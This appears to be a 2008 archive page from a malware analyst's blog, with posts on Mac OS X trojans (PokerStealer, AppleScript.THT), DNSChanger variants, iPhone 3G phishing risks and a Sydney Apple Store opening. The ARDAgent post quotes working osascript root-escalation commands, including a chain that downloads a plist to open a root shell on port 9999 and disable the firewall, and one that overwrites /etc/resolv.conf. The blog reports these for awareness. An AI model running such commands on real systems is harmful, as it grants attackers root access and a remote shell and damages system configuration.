Archive for June, 2008

Upcoming iPhone 3G

While Apple is about to release iPhone 3G on 11th of July, it’s possible that attackers will take major advantage of this upcoming event. In most cases like this, threats employs social engineering technique to trick users in taking the bait. This trick could be in the form of marketing or promotional emails which could lead to phishing sites or installation of various malwares.

Although there has been an incident of malicious spam emails specific for Latin America, this threats could fully escalate the attack into massive way.

Stay informed and Stay Safe online!

Today is my last day at PC Tools

Time has passed so quickly, today is my last day at PC Tools.

Just couple days ago, we released iAntiVirus Beta version where I had been working as analyst for the past couple of months. Today, I learned that it’s getting an average of 200 downloads per day and tomorrow there will be a media release. I wish you guys all the best and success!

This afternoon while the train crosses over the Sydney Harbour Bridge and Opera House, I just realized that this place is simply amazing and best in the whole world… and I will miss it alot!

But on the other side, I’m so excited on the next chapter of my life. Cheers!

Categories: Daily Thoughts Tags:

PokerStealer Another OSX Trojan

A day after SecureMac discovered AppleScript.THT, Intego released its security advisory discovering another trojan named OSX.Trojan.PokerStealer.

Let’s take a closer look …

 When clicking or executing, it displays this message box.  

However, it displays this error message box when the root password supplied is wrong.

In background, it connects to a remote server where it reports the infected users’ IP address.

Furthermore, it collects users’ information such as username, password hashes and IP address and logs it to a “secret_file” where this trojan tries retrieve these gathered information and sends it through email.

It also enable SSH for possible remote connection later. 

Zero Day: OS X ARD Agent Root Escalation Vulnerability

This is scary, I’ve tried and it works perfectly …. And now, a new OS X trojan on the loose exploiting this vulnerability.

So, what is this all about ? Usually, malwares in Mac requires root privilege to get installed just like DNSChanger. But in this case, exploiting Apple Remote Desktop (ARD) Agent vulnerability, the user can bypass this security and can gain root access.

This zero day vulnerability was actively discussed in this thread, where an anonymous reader writes:

“Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn’t switched to via fast user switching. Secure? I think not.”

And worst, another contributor in this thread divulge the real danger of this exploit.


Disconfirmed – I don’t have (and never have had) Screen Sharing enabled on Leopard 10.5.3, and this exploit works perfectly.

dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory
dan@Geelong:~$ osascript -e 'tell app "ARDAgent" to do shell script "touch /etc/somefile"'
dan@Geelong:~$ ls -lh /etc/somefile
-rw-rw-rw- 1 root wheel 0B Jun 18 14:16 /etc/somefile
dan@Geelong:~$ osascript -e 'tell app "ARDAgent" to do shell script "rm /etc/somefile"'
dan@Geelong:~$ ls -lh /etc/somefile
ls: /etc/somefile: No such file or directory

So, how dangerous is this? Here’s an example:

osascript -e ‘tell app “ARDAgent” to do shell script “cd

/System/Library/LaunchDaemons ; curl -o bash.plist [] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start ; ipfw disable firewall; launchctl “‘

This will download, install, load, and start a plist that provides an interactive bash shell on port 9999, and disables the ipfw firewall (Which is not enabled by default). If you run the above, you can ‘nc localhost 9999’ and find yourself at a root shell.

To remove, run ‘launchctl unload’ ‘launchctl unload /System/Library/LaunchDaemons/bash.plist’ and then ‘rm /System/Library/LaunchDaemons/bash.plist’

It should be noted that this service is accessible even if the application firewall is enabled. The only thing protecting the user at this point is their router firewall, if they have one, and that’s easily bypassed with a Python script.

So yeah; anything can be downloaded, and anything can be done with it. Scary.


I’ve got it to run destructive things as an ordinary user without any need for authentication beyond being logged in

% osascript -e 'tell app "ARDAgent" to do shell script "echo Nasty Content > /etc/resolv.conf"' % cat /etc/resolv.conf
Nasty Content


Security is like sex. Once you’re penetrated you’re ****ed. By AppleKid

New OS X Trojan In The Wild

SecureMac has discovered multiple variants of a new Trojan horse in the wild that affects Mac OS X 10.4 and 10.5. The Trojan horse is currently being distributed from a hacker website, where discussion has taken place on distributing the Trojan horse through iChat and Limewire.

The Trojan horse runs hidden on the system, and allows a malicious user complete remote access to the system, can transmit system and user passwords, and can avoid detection by opening ports in the firewall and turning off system logging. Additionally, the AppleScript.THT Trojan horse can log keystrokes, take pictures with the built-in Apple iSight camera, take screenshots, and turn on file sharing. The Trojan horse exploits a recently discovered vulnerability with the Apple Remote Desktop Agent, which allows it to run as root.

The Trojan is distributed as either a compiled AppleScript, called ASthtv05 (60 KB in size), or as an application bundle called AStht_v06 (3.1 MB in size). The user must download and open the Trojan horse in order to become infected. Once the Trojan horse is running, it will move itself into the /Library/Caches/ folder, and add itself to the System Login Items. [Read SecureMac Advisory]

I hope I can get a copy for analysis.

Apple Opens In Sydney

Hardcore fans fly in for Apple opening

MELBOURNE graphic designer Rochelle Quantock was on a 6am flight from Tullamarine yesterday morning. By 8am, she had arrived at her destination: the corner of George and King Streets, Sydney. [Read AustralianIT]

CBD chaos as Apple Store opens

Hundreds of Apple fans and onlookers clogged the pavements of George Street in the heart of Sydney’s CBD tonight to witness the opening of Australia’s first Apple Store. [Read Sydney Morning Herald]

And, I’m there to witness …

Apple Sydney Grand Opening Souvenir

New DNSChanger Hacks Router In Mac?

DNSChanger has two executables: EXE for Windows and DMG for Mac OS X. This threat has been around for quite sometime, but there’s nothing exceptional until last week a new variant captured our attention. [Read WashingtonPost blog]

A new EXE variant of DNSChanger is capable of changing users’ DNS settings by hacking the configuration page of the wireless router. Is this true ? Yes, it’s targeting a list of routers and performs dictionary attack.

Below are the extracted strings from EXEcutable file.

TrustedSource Blog published an analysis of this EXE variant.

Is there similar variant affecting Mac? Let’s check the latest downloadable DMG file, courtesy of several PornTube sites roaming around the net.

If you’ll notice, the installer package doesn’t contain anything new. As I mentioned in my previous post about OS X DNS Changer analysis, the malicious file here are preinstall and preupgrade (which contains exactly the same code).

The latest DNSChanger in Mac are obfuscated, which is a minor modification. Going further, the deobfuscated script clearly suggest that there’s nothing new except the variable IP address (s1 and s2).

So, the new behavior found in the latest DNSChanger in Windows doesn’t exist yet in Mac.